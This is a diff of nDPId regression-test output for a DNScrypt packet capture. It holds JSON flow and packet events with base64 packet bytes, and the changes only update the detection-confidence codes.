-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw60gAL0RoyUKAAABBb2qxOUaAdEGBCTIsoABAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw64gAL0RoyQKAAABBb2qxOllAdEGBCB7soIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":417,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337184} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":417,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw60Aub0Rx\/gKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":418,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337184} @@ -850,26 +850,26 @@ 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":946739337218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":946739337218,"pkt":"ZmZmZmZmRERERERECABFAADfmrpAADkRNRYFvarECgAAAQHRnywAy9B0soGAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAcAMABAAAQAADhAAfXxETlNDAAEAAECBm+\/xTzDeD4KSjeZIgKwk3d3hDoaJSO\/h1pwRZePAj9XQLJ\/4Aa45W8vDBSKrJViJIaMolD7iTZBWDGXuFATTYhzIUZpFJ+MsooNEpkdNSme+M97PW3cWzIMHmxZ+fdNiHMhRmkUnX1O28V9TqKVfU9NN"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAIcwiRAAL0R5K8KAAABuf2aQpc1EPcCCBcWY0cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwiUgAL0RAO8KAAABuf2aQq21EPcGBC1ZY0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAIcwiZAAL0R5K0KAAABuf2aQrL3EPcCCBcWY0sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 